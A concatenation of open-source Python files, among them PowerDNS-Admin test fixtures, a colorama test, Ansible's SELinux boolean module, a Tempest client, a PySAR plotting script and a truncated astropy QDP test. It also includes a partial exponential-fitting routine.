rmssave = rmsnew
pairssave = pairsnew
surface_original = np.sum(cnew / anew)
ind = []
# take the longest timescale out
ind.append(np.argmin(anew.real))
if pairsnew[ind]:
ind.append(ind[0]+1)
a_tba = anew[ind]
c_tba = cnew[ind]
pair_tba = pairsnew[ind]
surface = np.sum(cnew / anew)
y_old = copy.copy(y_decr)
y_decr = self.sumFExp(s, anew, cnew) - self.sumFExp(s, anew[ind], cnew[ind])
#~ deg_decr -= len(ind)
trialpoles, pairs = self._find_start_nodes(s, deg_decr, True, initpoles)
# stop if timescale is small enough
if anew[ind][0] > 1e3 / (0.2*lim):
if len(ind) == 1:
c_tba = surface * a_tba
elif len(ind) == 2:
c_tba[0] = surface * (a_tba[0].real**2 + a_tba[0].imag**2) / (2.*a_tba[0].real)
c_tba[1] = c_tba[0]
else:
raise ValueError('invalid array length')
keep_going = False
# stop if rmse is small enough
approx = self.sumFExp(s, a_tba, c_tba)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
if rms < rtol:
keep_going = False
# append new parameters to lists
a_s += a_tba.tolist(); c_s += c_tba.tolist(); pair_s += pair_tba.tolist()
# stop if to many parameters
if count >= 9.:
keep_going = False
count +=1
# for returning
alpha = np.array(a_s, dtype=complex); gamma = np.array(c_s, dtype=complex); pairs = np.array(pair_s, dtype=bool)
approx = self.sumFExp(s, alpha, gamma)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
# check whether it was better to go with the first parameters
if len(asave) < len(alpha) and rmssave < rtol:
alpha = asave; gamma = csave; pairs = pairssave
approx = self.sumFExp(s, alpha, gamma)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
surface_after = np.sum(gamma / alpha)
if np.abs(surface_original - surface_after) > rtol * surface_original:
print 'surface original: ', surface_original
print 'surface after: ', surface_after
if np.min(alpha.real) < 0.:
print '!!!owowow!!!'
else:
alist, clist, rmslist, pairslist = self._run_fit(s, y, trialpoles, pairs, rtol, maxiter, constrained, zerostart)
indmin = np.argmin(np.array(rmslist))
alpha, gamma, rms, approx, pairs = self.reduceSeries(s, y, alist[indmin], clist[indmin], pairs=pairslist[indmin], rtol=rtol)
if reduce_numexp:
alpha, gamma, rms, approx, pairs = self.reduceNumExp(s, y ,alpha, gamma, pairs, pplot=False)
return alpha, gamma, pairs, rms
def fitFExp_vector(self, s, ys, deg=20, rtol=1e-2, maxiter=5, extra_startpoles=[], extra_startpoles_pairs=[],
realpoles=True, initpoles='lin', reduce_series=False):
'''
Fit multiple data-arrays in Fourrier-domain simultaneously with a shared set of nodes
input:
[s]: numpy array of complex number, frequencies of data
[ys]: numpy ndarray of complex numbers, rows are different data-arrays
[deg]: int, the starting number of nodes
[rtol]: float, the relative tolercance at which to stop
[maxiter]: int, the maximal number of iterations after which to stop when rtol
is not reached
[extra_startpoles]: numpy array of complex number, additional initial poles
[extra_startpoles_pairs]: numpy bolean array, indicates complex conjugate pairs
associated with the extra initial poles
[realpoles]: boolean, if True the starting poles are real, if false the starting
poles are complex conjugates (and then the real degree is 2*deg)
[initpoles]: string specifying how the initial poles are distributed, choices are
'lin', 'log' and 'log10'
[reduce_series]: boolean, whether to delete expontentials of small influence after
the fitting
output:
[alpha]: complex numpy array of exponential coefficients
[gamma]: 2d complex numpy array, each row contains the residues corresponding to
the respective data arrays
[pairs]: boolean numpy array, indicates where a pair of complex conjugate
exponentials occurs
[rms]: float, aggregated root mean square error
'''
trialpoles, pairs = self._find_start_nodes(s, deg, realpoles, initpoles)
if len(extra_startpoles) > 0:
trialpoles = np.concatenate((trialpoles, extra_startpoles))
pairs = np.concatenate((pairs, extra_startpoles_pairs))
alist, clist, rmslist, pairslist = self._run_fit_vector(s, ys, trialpoles, pairs, rtol, maxiter)
indmin = np.argmin(np.array(rmslist))
if reduce_series:
# reduce the number of exponentials for each function separately
alpha_arr = np.array([], dtype=complex)
rms = 0.
for ind, c in enumerate(clist[indmin]):
alpha, gamma, rms_ind, approx, pair = self.reduceSeries(s, ys[ind], alist[indmin], c, pairs=pairslist[indmin], rtol=rtol)
rms += rms_ind
alpha_arr = np.concatenate((alpha_arr, alpha))
alpha_arr = np.unique(alpha_arr)
# search positions of common alphas
asortind = np.argsort(alist[indmin])
alphapos = np.searchsorted(alist[indmin][asortind], alpha_arr)
inds = asortind[alphapos]
return alist[indmin][inds], clist[indmin][:,inds], pairslist[indmin][inds], rms
else:
return alist[indmin], clist[indmin], pairslist[indmin], rmslist[indmin]
| mit |
ngoduykhanh/PowerDNS-Admin | tests/fixtures.py | 1 | 8705 | import os
import pytest
import flask_migrate
from base64 import b64encode
from powerdnsadmin import create_app
from powerdnsadmin.models.base import db
from powerdnsadmin.models.user import User
from powerdnsadmin.models.setting import Setting
from powerdnsadmin.models.api_key import ApiKey
app = create_app('../configs/test.py')
ctx = app.app_context()
ctx.push()
@pytest.fixture
def client():
app.config['TESTING'] = True
client = app.test_client()
yield client
def load_data(setting_name, *args, **kwargs):
if setting_name == 'maintenance':
return 0
if setting_name == 'pdns_api_url':
return 'http://empty'
if setting_name == 'pdns_api_key':
return 'XXXX'
if setting_name == 'pdns_version':
return '4.1.0'
if setting_name == 'google_oauth_enabled':
return False
if setting_name == 'session_timeout':
return 10
if setting_name == 'allow_user_create_domain':
return True
@pytest.fixture
def test_admin_user():
return app.config.get('TEST_ADMIN_USER')
@pytest.fixture
def test_user():
return app.config.get('TEST_USER')
@pytest.fixture
def basic_auth_admin_headers():
test_admin_user = app.config.get('TEST_ADMIN_USER')
test_admin_pass = app.config.get('TEST_ADMIN_PASSWORD')
user_pass = "{0}:{1}".format(test_admin_user, test_admin_pass)
user_pass_base64 = b64encode(user_pass.encode('utf-8'))
headers = {
"Authorization": "Basic {0}".format(user_pass_base64.decode('utf-8'))
}
return headers
@pytest.fixture
def basic_auth_user_headers():
test_user = app.config.get('TEST_USER')
test_user_pass = app.config.get('TEST_USER_PASSWORD')
user_pass = "{0}:{1}".format(test_user, test_user_pass)
user_pass_base64 = b64encode(user_pass.encode('utf-8'))
headers = {
"Authorization": "Basic {0}".format(user_pass_base64.decode('utf-8'))
}
return headers
@pytest.fixture(scope="module")
def initial_data():
pdns_proto = os.environ['PDNS_PROTO']
pdns_host = os.environ['PDNS_HOST']
pdns_port = os.environ['PDNS_PORT']
pdns_api_url = '{0}://{1}:{2}'.format(pdns_proto, pdns_host, pdns_port)
api_url_setting = Setting('pdns_api_url', pdns_api_url)
api_key_setting = Setting('pdns_api_key', os.environ['PDNS_API_KEY'])
allow_create_domain_setting = Setting('allow_user_create_domain', True)
try:
flask_migrate.upgrade()
db.session.add(api_url_setting)
db.session.add(api_key_setting)
db.session.add(allow_create_domain_setting)
test_user = app.config.get('TEST_USER')
test_user_pass = app.config.get('TEST_USER_PASSWORD')
test_admin_user = app.config.get('TEST_ADMIN_USER')
test_admin_pass = app.config.get('TEST_ADMIN_PASSWORD')
admin_user = User(username=test_admin_user,
plain_text_password=test_admin_pass,
email="admin@admin.com")
msg = admin_user.create_local_user()
if not msg:
raise Exception("Error occurred creating user {0}".format(msg))
ordinary_user = User(username=test_user,
plain_text_password=test_user_pass,
email="test@test.com")
msg = ordinary_user.create_local_user()
if not msg:
raise Exception("Error occurred creating user {0}".format(msg))
except Exception as e:
print("Unexpected ERROR: {0}".format(e))
raise e
yield
db.session.close()
os.unlink(app.config['TEST_DB_LOCATION'])
@pytest.fixture(scope="module")
def initial_apikey_data():
pdns_proto = os.environ['PDNS_PROTO']
pdns_host = os.environ['PDNS_HOST']
pdns_port = os.environ['PDNS_PORT']
pdns_api_url = '{0}://{1}:{2}'.format(pdns_proto, pdns_host, pdns_port)
api_url_setting = Setting('pdns_api_url', pdns_api_url)
api_key_setting = Setting('pdns_api_key', os.environ['PDNS_API_KEY'])
allow_create_domain_setting = Setting('allow_user_create_domain', True)
try:
flask_migrate.upgrade()
db.session.add(api_url_setting)
db.session.add(api_key_setting)
db.session.add(allow_create_domain_setting)
test_user_apikey = app.config.get('TEST_USER_APIKEY')
test_admin_apikey = app.config.get('TEST_ADMIN_APIKEY')
dummy_apikey = ApiKey(desc="dummy", role_name="Administrator")
admin_key = dummy_apikey.get_hashed_password(
plain_text_password=test_admin_apikey).decode('utf-8')
admin_apikey = ApiKey(key=admin_key,
desc="test admin apikey",
role_name="Administrator")
admin_apikey.create()
user_key = dummy_apikey.get_hashed_password(
plain_text_password=test_user_apikey).decode('utf-8')
user_apikey = ApiKey(key=user_key,
desc="test user apikey",
role_name="User")
user_apikey.create()
except Exception as e:
print("Unexpected ERROR: {0}".format(e))
raise e
yield
db.session.close()
os.unlink(app.config['TEST_DB_LOCATION'])
@pytest.fixture
def zone_data():
data = {
"name": "example.org.",
"kind": "NATIVE",
"nameservers": ["ns1.example.org."]
}
return data
@pytest.fixture
def created_zone_data():
data = {
'url':
'/api/v1/servers/localhost/zones/example.org.',
'soa_edit_api':
'DEFAULT',
'last_check':
0,
'masters': [],
'dnssec':
False,
'notified_serial':
0,
'nsec3narrow':
False,
'serial':
2019013101,
'nsec3param':
'',
'soa_edit':
'',
'api_rectify':
False,
'kind':
'Native',
'rrsets': [{
'comments': [],
'type':
'SOA',
'name':
'example.org.',
'ttl':
3600,
'records': [{
'content':
'a.misconfigured.powerdns.server. hostmaster.example.org. 2019013101 10800 3600 604800 3600',
'disabled': False
}]
}, {
'comments': [],
'type':
'NS',
'name':
'example.org.',
'ttl':
3600,
'records': [{
'content': 'ns1.example.org.',
'disabled': False
}]
}],
'name':
'example.org.',
'account':
'',
'id':
'example.org.'
}
return data
def user_apikey_data():
data = {
"description": "userkey",
"domains": ["example.org"],
"role": "User"
}
return data
def admin_apikey_data():
data = {"description": "masterkey", "domains": [], "role": "Administrator"}
return data
@pytest.fixture(scope='module')
def user_apikey_integration():
test_user_apikey = app.config.get('TEST_USER_APIKEY')
headers = create_apikey_headers(test_user_apikey)
return headers
@pytest.fixture(scope='module')
def admin_apikey_integration():
test_user_apikey = app.config.get('TEST_ADMIN_APIKEY')
headers = create_apikey_headers(test_user_apikey)
return headers
@pytest.fixture(scope='module')
def user_apikey():
data = user_apikey_data()
api_key = ApiKey(desc=data['description'],
role_name=data['role'],
domains=[])
headers = create_apikey_headers(api_key.plain_key)
return headers
@pytest.fixture(scope='module')
def admin_apikey():
data = admin_apikey_data()
api_key = ApiKey(desc=data['description'],
role_name=data['role'],
domains=[])
headers = create_apikey_headers(api_key.plain_key)
return headers
def create_apikey_headers(passw):
user_pass_base64 = b64encode(passw.encode('utf-8'))
headers = {"X-API-KEY": "{0}".format(user_pass_base64.decode('utf-8'))}
return headers
@pytest.fixture
def account_data():
data = {
"name": "test1",
"description": "test1 account",
"contact": "test1 contact",
"mail": "test1@example.com",
}
return data
@pytest.fixture
def user1_data():
data = {
"username": "testuser1",
"plain_text_password": "ChangeMePlease",
"firstname": "firstname1",
"lastname": "lastname1",
"email": "testuser1@example.com",
"otp_secret": "",
"confirmed": False,
"role_name": "User",
}
return data
| mit |
msabramo/colorama | colorama/tests/winterm_test.py | 3 | 3580 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from mock import Mock, patch
try:
from unittest2 import TestCase, main
except ImportError:
from unittest import TestCase, main
from ..winterm import WinColor, WinStyle, WinTerm
class WinTermTest(TestCase):
@patch('colorama.winterm.win32')
def testInit(self, mockWin32):
mockAttr = Mock()
mockAttr.wAttributes = 7 + 6 * 16 + 8
mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
term = WinTerm()
self.assertEquals(term._fore, 7)
self.assertEquals(term._back, 6)
self.assertEquals(term._style, 8)
def testGetAttrs(self):
term = WinTerm()
term._fore = 0
term._back = 0
term._style = 0
self.assertEquals(term.get_attrs(), 0)
term._fore = WinColor.YELLOW
self.assertEquals(term.get_attrs(), WinColor.YELLOW)
term._back = WinColor.MAGENTA
self.assertEquals(
term.get_attrs(),
WinColor.YELLOW + WinColor.MAGENTA * 16)
term._style = WinStyle.BRIGHT
self.assertEquals(
term.get_attrs(),
WinColor.YELLOW + WinColor.MAGENTA * 16 + WinStyle.BRIGHT)
@patch('colorama.winterm.win32')
def testResetAll(self, mockWin32):
mockAttr = Mock()
mockAttr.wAttributes = 1 + 2 * 16 + 8
mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
term = WinTerm()
term.set_console = Mock()
term._fore = -1
term._back = -1
term._style = -1
term.reset_all()
self.assertEquals(term._fore, 1)
self.assertEquals(term._back, 2)
self.assertEquals(term._style, 8)
self.assertEquals(term.set_console.called, True)
def testFore(self):
term = WinTerm()
term.set_console = Mock()
term._fore = 0
term.fore(5)
self.assertEquals(term._fore, 5)
self.assertEquals(term.set_console.called, True)
def testBack(self):
term = WinTerm()
term.set_console = Mock()
term._back = 0
term.back(5)
self.assertEquals(term._back, 5)
self.assertEquals(term.set_console.called, True)
def testStyle(self):
term = WinTerm()
term.set_console = Mock()
term._style = 0
term.style(22)
self.assertEquals(term._style, 22)
self.assertEquals(term.set_console.called, True)
@patch('colorama.winterm.win32')
def testSetConsole(self, mockWin32):
mockAttr = Mock()
mockAttr.wAttributes = 0
mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
term = WinTerm()
term.windll = Mock()
term.set_console()
self.assertEquals(
mockWin32.SetConsoleTextAttribute.call_args,
((mockWin32.STDOUT, term.get_attrs()), {})
)
@patch('colorama.winterm.win32')
def testSetConsoleOnStderr(self, mockWin32):
mockAttr = Mock()
mockAttr.wAttributes = 0
mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
term = WinTerm()
term.windll = Mock()
term.set_console(on_stderr=True)
self.assertEquals(
mockWin32.SetConsoleTextAttribute.call_args,
((mockWin32.STDERR, term.get_attrs()), {})
)
if __name__ == '__main__':
main()
| bsd-3-clause |
andmos/ansible | lib/ansible/modules/system/seboolean.py | 47 | 10825 | #!/usr/bin/python
# Copyright: (c) 2012, Stephen Fromm <sfromm@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: seboolean
short_description: Toggles SELinux booleans
description:
- Toggles SELinux booleans.
version_added: "0.7"
options:
name:
description:
- Name of the boolean to configure.
required: true
persistent:
description:
- Set to C(yes) if the boolean setting should survive a reboot.
type: bool
default: 'no'
state:
description:
- Desired boolean value
type: bool
required: true
ignore_selinux_state:
description:
- Useful for scenarios (chrooted environment) that you can't get the real SELinux state.
type: bool
default: false
version_added: '2.8'
notes:
- Not tested on any Debian based system.
requirements:
- libselinux-python
- libsemanage-python
author:
- Stephen Fromm (@sfromm)
'''
EXAMPLES = '''
- name: Set httpd_can_network_connect flag on and keep it persistent across reboots
seboolean:
name: httpd_can_network_connect
state: yes
persistent: yes
'''
import os
import traceback
SELINUX_IMP_ERR = None
try:
import selinux
HAVE_SELINUX = True
except ImportError:
SELINUX_IMP_ERR = traceback.format_exc()
HAVE_SELINUX = False
SEMANAGE_IMP_ERR = None
try:
import semanage
HAVE_SEMANAGE = True
except ImportError:
SEMANAGE_IMP_ERR = traceback.format_exc()
HAVE_SEMANAGE = False
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible.module_utils.six import binary_type
from ansible.module_utils._text import to_bytes, to_text
def get_runtime_status(ignore_selinux_state=False):
return True if ignore_selinux_state is True else selinux.is_selinux_enabled()
def has_boolean_value(module, name):
bools = []
try:
rc, bools = selinux.security_get_boolean_names()
except OSError:
module.fail_json(msg="Failed to get list of boolean names")
# work around for selinux who changed its API, see
# https://github.com/ansible/ansible/issues/25651
if len(bools) > 0:
if isinstance(bools[0], binary_type):
name = to_bytes(name)
if name in bools:
return True
else:
return False
def get_boolean_value(module, name):
state = 0
try:
state = selinux.security_get_boolean_active(name)
except OSError:
module.fail_json(msg="Failed to determine current state for boolean %s" % name)
if state == 1:
return True
else:
return False
def semanage_get_handle(module):
handle = semanage.semanage_handle_create()
if not handle:
module.fail_json(msg="Failed to create semanage library handle")
managed = semanage.semanage_is_managed(handle)
if managed <= 0:
semanage.semanage_handle_destroy(handle)
if managed < 0:
module.fail_json(msg="Failed to determine whether policy is manage")
if managed == 0:
if os.getuid() == 0:
module.fail_json(msg="Cannot set persistent booleans without managed policy")
else:
module.fail_json(msg="Cannot set persistent booleans; please try as root")
if semanage.semanage_connect(handle) < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to connect to semanage")
return handle
def semanage_begin_transaction(module, handle):
if semanage.semanage_begin_transaction(handle) < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to begin semanage transaction")
def semanage_set_boolean_value(module, handle, name, value):
rc, t_b = semanage.semanage_bool_create(handle)
if rc < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to create seboolean with semanage")
if semanage.semanage_bool_set_name(handle, t_b, name) < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to set seboolean name with semanage")
rc, boolkey = semanage.semanage_bool_key_extract(handle, t_b)
if rc < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to extract boolean key with semanage")
rc, exists = semanage.semanage_bool_exists(handle, boolkey)
if rc < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to check if boolean is defined")
if not exists:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="SELinux boolean %s is not defined in persistent policy" % name)
rc, sebool = semanage.semanage_bool_query(handle, boolkey)
if rc < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to query boolean in persistent policy")
semanage.semanage_bool_set_value(sebool, value)
if semanage.semanage_bool_modify_local(handle, boolkey, sebool) < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to modify boolean key with semanage")
if semanage.semanage_bool_set_active(handle, boolkey, sebool) < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to set boolean key active with semanage")
semanage.semanage_bool_key_free(boolkey)
semanage.semanage_bool_free(t_b)
semanage.semanage_bool_free(sebool)
def semanage_get_boolean_value(module, handle, name):
rc, t_b = semanage.semanage_bool_create(handle)
if rc < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to create seboolean with semanage")
if semanage.semanage_bool_set_name(handle, t_b, name) < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to set seboolean name with semanage")
rc, boolkey = semanage.semanage_bool_key_extract(handle, t_b)
if rc < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to extract boolean key with semanage")
rc, exists = semanage.semanage_bool_exists(handle, boolkey)
if rc < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to check if boolean is defined")
if not exists:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="SELinux boolean %s is not defined in persistent policy" % name)
rc, sebool = semanage.semanage_bool_query(handle, boolkey)
if rc < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to query boolean in persistent policy")
value = semanage.semanage_bool_get_value(sebool)
semanage.semanage_bool_key_free(boolkey)
semanage.semanage_bool_free(t_b)
semanage.semanage_bool_free(sebool)
return value
def semanage_commit(module, handle, load=0):
semanage.semanage_set_reload(handle, load)
if semanage.semanage_commit(handle) < 0:
semanage.semanage_handle_destroy(handle)
module.fail_json(msg="Failed to commit changes to semanage")
def semanage_destroy_handle(module, handle):
rc = semanage.semanage_disconnect(handle)
semanage.semanage_handle_destroy(handle)
if rc < 0:
module.fail_json(msg="Failed to disconnect from semanage")
# The following method implements what setsebool.c does to change
# a boolean and make it persist after reboot..
def semanage_boolean_value(module, name, state):
value = 0
changed = False
if state:
value = 1
try:
handle = semanage_get_handle(module)
semanage_begin_transaction(module, handle)
cur_value = semanage_get_boolean_value(module, handle, name)
if cur_value != value:
changed = True
if not module.check_mode:
semanage_set_boolean_value(module, handle, name, value)
semanage_commit(module, handle)
semanage_destroy_handle(module, handle)
except Exception as e:
module.fail_json(msg=u"Failed to manage policy for boolean %s: %s" % (name, to_text(e)))
return changed
def set_boolean_value(module, name, state):
rc = 0
value = 0
if state:
value = 1
try:
rc = selinux.security_set_boolean(name, value)
except OSError:
module.fail_json(msg="Failed to set boolean %s to %s" % (name, value))
if rc == 0:
return True
else:
return False
def main():
module = AnsibleModule(
argument_spec=dict(
ignore_selinux_state=dict(type='bool', default=False),
name=dict(type='str', required=True),
persistent=dict(type='bool', default=False),
state=dict(type='bool', required=True),
),
supports_check_mode=True,
)
if not HAVE_SELINUX:
module.fail_json(msg=missing_required_lib('libselinux-python'), exception=SELINUX_IMP_ERR)
if not HAVE_SEMANAGE:
module.fail_json(msg=missing_required_lib('libsemanage-python'), exception=SEMANAGE_IMP_ERR)
ignore_selinux_state = module.params['ignore_selinux_state']
if not get_runtime_status(ignore_selinux_state):
module.fail_json(msg="SELinux is disabled on this host.")
name = module.params['name']
persistent = module.params['persistent']
state = module.params['state']
result = dict(
name=name,
persistent=persistent,
state=state
)
changed = False
if hasattr(selinux, 'selinux_boolean_sub'):
# selinux_boolean_sub allows sites to rename a boolean and alias the old name
# Feature only available in selinux library since 2012.
name = selinux.selinux_boolean_sub(name)
if not has_boolean_value(module, name):
module.fail_json(msg="SELinux boolean %s does not exist." % name)
if persistent:
changed = semanage_boolean_value(module, name, state)
else:
cur_value = get_boolean_value(module, name)
if cur_value != state:
changed = True
if not module.check_mode:
changed = set_boolean_value(module, name, state)
if not changed:
module.fail_json(msg="Failed to set boolean %s to %s" % (name, state))
try:
selinux.security_commit_booleans()
except Exception:
module.fail_json(msg="Failed to commit pending boolean %s value" % name)
result['changed'] = changed
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
pandeyop/tempest | tempest/services/compute/json/limits_client.py | 6 | 1039 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from tempest.api_schema.response.compute.v2_1 import limits as schema
from tempest.common import service_client
class LimitsClient(service_client.ServiceClient):
def show_limits(self):
resp, body = self.get("limits")
body = json.loads(body)
self.validate_response(schema.get_limit, resp, body)
return service_client.ResponseBody(resp, body['limits'])
| apache-2.0 |
mohseniaref/PySAR-1 | pysar/plot.py | 1 | 6588 | #! /usr/bin/env python
############################################################
# Program is part of PySAR v1.0 #
# Copyright(c) 2013, Heresh Fattahi #
# Author: Heresh Fattahi #
############################################################
#from matplotlib import colors
import getopt
import numpy as np
import h5py
import _readfile as readfile
import _pysar_utilities as ut
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import sys
import os
from matplotlib.colors import LinearSegmentedColormap
def Usage():
print '''
plotting the geocoded PySAR product
plot.py -f velocity.h5 -d dem -m min -M max -x subset -y subst -o outName -i inverse colormap display (yes or no) -c colomap
-x : 'xmin:xmax'
-y : 'ymin:ymax'
-c : all colormaps in matplotlib is supported (see http://matplotlib.org/examples/pylab_examples/show_colormaps.html)
Examples:
plot.py -f geo_velocity.h5 -d Sonoran.dem -m -0.01 -M 0.01 -i yes -o plotVelocity.png -c pysar_hsv
'''
def main(argv):
color_map='jet'
disp_opposite='no'
try:
opts, args = getopt.getopt(argv,"h:f:d:o:x:y:m:M:i:c:")
except getopt.GetoptError:
Usage() ; sys.exit(1)
if opts==[]:
Usage() ; sys.exit(1)
for opt,arg in opts:
if opt in ("-h","--help"):
Usage()
sys.exit()
elif opt == '-f':
File = arg
elif opt == '-d':
demFile=arg
elif opt=='-m':
Vmin=float(arg)
elif opt=='-M':
Vmax=float(arg)
elif opt == '-x':
winx=arg.split(':')
elif opt == '-y':
winy = arg.split(':')
elif opt == '-o':
outName = arg
elif opt == '-i':
disp_opposite = arg
elif opt == '-c':
color_map=arg
h5file=h5py.File(File,'r')
k=h5file.keys()
print k[0]
# ccmap=plt.get_cmap(color_map)
################################################
cdict1 = {'red': ((0.0, 0.0, 0.0),
(0.5, 0.0, 0.0),
(0.6, 1.0, 1.0),
(0.8, 1.0, 1.0),
(1.0, 0.5, 0.5)),
'green': ((0.0, 0.0, 0.0),
(0.2, 0.0, 0.0),
(0.4, 1.0, 1.0),
(0.6, 1.0, 1.0),
(0.8, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.5, .5),
(0.2, 1.0, 1.0),
(0.4, 1.0, 1.0),
(0.5, 0.0, 0.0),
(1.0, 0.0, 0.0),)
}
if color_map =='pysar_hsv':
ccmap = LinearSegmentedColormap('BlueRed1', cdict1)
else:
ccmap=plt.get_cmap(color_map)
print 'colormap is : '+ color_map
################################################
dset = h5file[k[0]].get(k[0])
data=dset[0:dset.shape[0],0:dset.shape[1]]
if disp_opposite in('yes','Yes','Y','y','YES'):
data=-1*data
try:
xref=h5file[k[0]].attrs['ref_x']
yref=h5file[k[0]].attrs['ref_y']
except:
print 'No reference point'
try:
ullon=float(h5file[k[0]].attrs['X_FIRST'])
ullat=float(h5file[k[0]].attrs['Y_FIRST'])
lon_step=float(h5file[k[0]].attrs['X_STEP'])
lat_step=float(h5file[k[0]].attrs['Y_STEP'])
lon_unit=h5file[k[0]].attrs['Y_UNIT']
lat_unit=h5file[k[0]].attrs['X_UNIT']
llcrnrlon=ullon
llcrnrlat=ullat+lat_step*data.shape[0]
urcrnrlon=ullon+lon_step*data.shape[1]
urcrnrlat=ullat
geocoord='yes'
print 'Input file is Geocoded'
except:
geocoord='no'
fig = plt.figure()
ax = fig.add_axes([0.1,0.1,0.8,0.8])
m = Basemap(llcrnrlon=llcrnrlon, llcrnrlat=llcrnrlat, urcrnrlon=urcrnrlon, urcrnrlat=urcrnrlat,
resolution='l', area_thresh=1., projection='cyl',suppress_ticks=False,ax=ax)
print demFile
demFile
if os.path.basename(demFile).split('.')[1]=='hgt':
amp,dem,demRsc = readfile.read_float32(demFile)
elif os.path.basename(demFile).split('.')[1]=='dem':
dem,demRsc = readfile.read_dem(demFile)
#################################################################
try:
winx
wx=[int(i) for i in win_x.split()]
dem=dem[:,wx[0]:wx[1]]
data=data[:,wx[0]:wx[1]]
ullon=float(h5file[k[0]].attrs['X_FIRST'])+wx[0]
llcrnrlon=ullon
urcrnrlon=ullon+lon_step*data.shape[1]
except:
print ''
try:
winy
wy=[int(i) for i in winy.split()]
dem=dem[wy[0]:wy[1],:]
data=data[wy[0]:wy[1],:]
except:
print ''
################################################################
fig = plt.figure()
ax = fig.add_axes([0.1,0.1,0.8,0.8])
m = Basemap(llcrnrlon=llcrnrlon, llcrnrlat=llcrnrlat, urcrnrlon=urcrnrlon, urcrnrlat=urcrnrlat,
resolution='l', area_thresh=1., projection='cyl',suppress_ticks=False,ax=ax)
cmap_dem=plt.get_cmap('gray')
m.imshow(ut.hillshade(np.flipud(dem),50.0),cmap=cmap_dem)
try:
im=m.imshow(np.flipud(data),vmin=Vmin,vmax=Vmax,cmap=ccmap)
# cb = m.colorbar(im,"right", size="5%", pad='2%')
except:
im=m.imshow(np.flipud(data))
# cb = m.colorbar(im,"right", size="5%", pad='2%')
# m.bluemarble()
# cb = m.colorbar(im,"right", size="5%", pad='2%')
# parallels = np.arange(31.,34,0.5)
# m.drawparallels(parallels,labels=[1,0,0,1],linewidth=0.0)
# meridians = np.arange(-115.,-112.,0.5)
# m.drawmeridians(meridians,labels=[1,0,0,1],linewidth=0.0)
# m.drawmapscale()
# m = Basemap(llcrnrlon=-110.,llcrnrlat=0.,urcrnrlon=-20.,urcrnrlat=57.,
# projection='lcc',lat_1=20.,lat_2=40.,lon_0=-60.,
# resolution ='l',area_thresh=1000.)
# m.drawcoastlines()
# m.drawcountries()
# m.drawmapboundary(fill_color='#99ffff')
# m.fillcontinents(color='#cc9966',lake_color='#99ffff')
# m.drawparallels(np.arange(10,70,20),labels=[1,1,0,0])
# m.drawmeridians(np.arange(-100,0,20),labels=[0,0,0,1])
# plt.title('Atlantic Hurricane Tracks (Storms Reaching Category 4, 1851-2004)')
try:
figName = outName
except:
outName=os.path.basename(File).replace('.h5','')
figName = outName + '.png'
plt.savefig(figName,pad_inches=0.0)
# plt.show()
h5file.close()
if __name__ == '__main__':
main(sys.argv[1:])
| mit |
astropy/astropy | astropy/io/ascii/tests/test_qdp.py | 5 | 9090 | import numpy as np
import pytest
from astropy.io import ascii
from astropy.io.ascii.qdp import _read_table_qdp, _write_table_qdp
from astropy.io.ascii.qdp import _get_lines_from_file
from astropy.table import Table, Column, MaskedColumn
from astropy.utils.exceptions import AstropyUserWarning
def test_get_tables_from_qdp_file(tmpdir):
example_qdp = """
! Swift/XRT hardness ratio of trigger: XXXX, name: BUBU X-2
! Columns are as labelled
READ TERR 1
READ SERR 2
! WT -- hard data
!MJD Err (pos) Err(neg) Rate Error
53000.123456 2.37847222222222e-05 -2.37847222222222e-05 -0.212439 0.212439
55045.099887 1.14467592592593e-05 -1.14467592592593e-05 0.000000 0.000000
NO NO NO NO NO
! WT -- soft data
!MJD Err (pos) Err(neg) Rate Error
53000.123456 2.37847222222222e-05 -2.37847222222222e-05 0.726155 0.583890
55045.099887 1.14467592592593e-05 -1.14467592592593e-05 2.410935 1.393592
NO NO NO NO NO
! WT -- hardness ratio
!MJD Err (pos) Err(neg) Rate Error
